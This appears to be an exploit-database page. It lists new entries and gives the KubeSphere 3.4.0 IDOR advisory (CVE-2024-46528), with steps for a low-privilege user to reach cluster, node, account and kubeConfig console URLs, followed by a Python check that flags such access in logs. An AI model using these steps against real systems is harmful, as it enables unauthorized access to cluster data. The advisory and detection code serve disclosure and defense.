
4 changes to exploits/shellcodes/ghdb KubeSphere 3.4.0 - Insecure Direct Object Reference (IDOR) MoziloCMS 3.0 - Remote Code Execution (RCE) X2CRM 8.5 - Stored Cross-Site Scripting (XSS)
# Exploit Title: IDOR Vulnerability in KubeSphere v3.4.0 & KubeSphere Enterprise v4.1.1
# Date: 3 September
# Exploit Author: Okan Kurtulus
# Vendor Homepage: https://kubesphere.io
# Software Link: https://github.com/kubesphere/kubesphere
# Version: [>= 4.0.0 & < 4.1.3] , [>= 3.0.0 & < 3.4.1]
# Tested on: Ubuntu 22.04
# CVE : CVE-2024-46528

1-) Log in to the system with a user who is not registered to any workspace (e.g., a "platform-regular" user who has limited authorization).

Note: The authorization level of this user is as follows:
"Cannot access any resources before joining a workspace."

2-) After logging in with this user, it has been observed that cluster information, node information, users registered in the system, and other similar areas can be accessed without the user being registered to any workspace or cluster.

Examples of accessible endpoints:

http://xxx.xxx.xx.xx:30880/clusters/default/overview
http://xxx.xxx.xx.xx:30880/clusters/default/nodes
http://xxx.xxx.xx.xx:30880/access/accounts
http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/ranking
http://xxx.xxx.xx.xx:30880/clusters/default/monitor-cluster/resource
http://xxx.xxx.xx.xx:30880/clusters/default/projects
http://xxx.xxx.xx.xx:30880/clusters/default/nodes/minikube/pods
http://xxx.xxx.xx.xx:30880/clusters/default/kubeConfig
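
A defender-side check for the behaviour described above, as an added example that is not part of the original advisory: it tests a version string against the affected ranges in the Version line and flags 200 responses on the listed console routes that were served to users with no workspace membership. The record shape, the membership map, the host name and the generalization of `default` and `minikube` to any cluster or node name are assumptions; the page gives console URLs only, so backend API paths are not covered.

```python
import re
from urllib.parse import urlsplit

# Console routes from the advisory; cluster and node names generalized (assumption).
SENSITIVE_ROUTES = [re.compile(p) for p in (
    r"^/clusters/[^/]+/overview$",
    r"^/clusters/[^/]+/nodes(/[^/]+/pods)?$",
    r"^/clusters/[^/]+/monitor-cluster/(ranking|resource)$",
    r"^/clusters/[^/]+/projects$",
    r"^/clusters/[^/]+/kubeConfig$",
    r"^/access/accounts$",
)]

# Affected ranges from the advisory's "Version" line, as half-open intervals.
AFFECTED = [((3, 0, 0), (3, 4, 1)), ((4, 0, 0), (4, 1, 3))]

def is_affected(version):
    """True if a version string such as 'v3.4.0' falls in an affected range."""
    m = re.match(r"v?(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unparseable version: {version!r}")
    v = tuple(int(x) for x in m.groups())
    return any(lo <= v < hi for lo, hi in AFFECTED)

def flag_requests(records, workspaces_by_user):
    """Return (user, path) for each 200 response on a listed route that was
    served to a user with no workspace membership (unknown users included)."""
    findings = []
    for rec in records:
        if rec["status"] != 200 or workspaces_by_user.get(rec["user"]):
            continue
        path = urlsplit(rec["url"]).path.rstrip("/")
        if any(r.match(path) for r in SENSITIVE_ROUTES):
            findings.append((rec["user"], path))
    return findings

# Constructed sample data; the record shape and names are hypothetical.
MEMBERSHIP = {"alice": ["dev-ws"], "regular1": []}
BASE = "http://console.example:30880"
SAMPLE = [
    {"user": "regular1", "url": BASE + "/clusters/default/nodes", "status": 200},
    {"user": "alice", "url": BASE + "/clusters/default/overview", "status": 200},
    {"user": "regular1", "url": BASE + "/access/accounts", "status": 403},
    {"user": "regular1", "url": BASE + "/clusters/default/nodes/minikube/pods", "status": 200},
    {"user": "regular1", "url": BASE + "/dashboard", "status": 200},
]

if __name__ == "__main__":
    print(is_affected("3.4.0"), flag_requests(SAMPLE, MEMBERSHIP))
```

Feed `flag_requests` records parsed from whatever reverse-proxy or audit log sits in front of the console, and build the membership map from the platform's own workspace role bindings.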